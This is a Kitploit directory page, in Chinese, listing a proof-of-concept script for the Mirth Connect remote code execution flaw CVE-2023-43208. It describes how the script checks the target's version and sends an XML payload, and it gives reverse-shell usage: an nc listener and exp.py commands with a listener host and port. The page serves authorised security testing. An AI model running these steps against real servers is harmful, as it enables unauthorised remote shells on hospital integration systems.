Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-43208 — PoC for CVE-2023-43208 RCE exploitation. | Kitploit
工具/GitHubGitHub/predyy/cve-2023-43208
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubpredyy/cve-2023-43208

CVE-2023-43208

PoC for CVE-2023-43208 RCE exploitation.

查看仓库
115个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-43208 Mirth Connect 远程代码执行概念验证

针对 Mirth Connect 中 CVE-2023-43208 的概念验证 Python 脚本。

免责声明

仅限在您拥有或明确授权测试的环境中使用。此仓库用于安全研究、验证和防御性测试。作者不对因使用此工具造成的任何误用或损害承担责任。

概述

exp.py 是 PoC 的一个最小依赖版本,它能够:

  • 检测目标是否看起来是 Mirth Connect 实例
  • 通过 /api/server/version 请求 Mirth Connect 版本
  • 检查版本是否低于 4.4.1
  • 如果目标看似存在漏洞,则向 /api/users 发送 XML 负载

脚本默认使用 HTTPS,可通过 --http 切换为 HTTP。

使用方法

root@kitploit:~
python3 exp.py -u <目标> -lh <监听主机> -lp <监听端口> [--http]

参数

  • -u, --url:目标 Mirth Connect URL 或主机
  • -lh, --lhost:用于反向连接的本地主机/IP
  • -lp, --lport:本地监听端口
  • --http:强制使用 HTTP 而非 HTTPS(默认使用 HTTPS)

示例

先启动一个监听器:

root@kitploit:~
nc -lvnp 4444

运行脚本:

root@kitploit:~
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444

对于仅支持 HTTP 的目标:

root@kitploit:~
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http

注意事项

  • 脚本中禁用了 SSL 证书验证。
  • 脚本在发送负载前会提示确认。
  • 版本检测基于与 4.4.1 的语义比较。
  • 检测为 Mirth Connect 的目标并不保证可被利用(网络、环境和运行时差异可能影响结果)。

致谢

  • 原始漏洞发现:IHTeam
  • 原始代码:K3ysTr0K3R 和 Chocapikk
  • 最小依赖版本:predyy
下载工具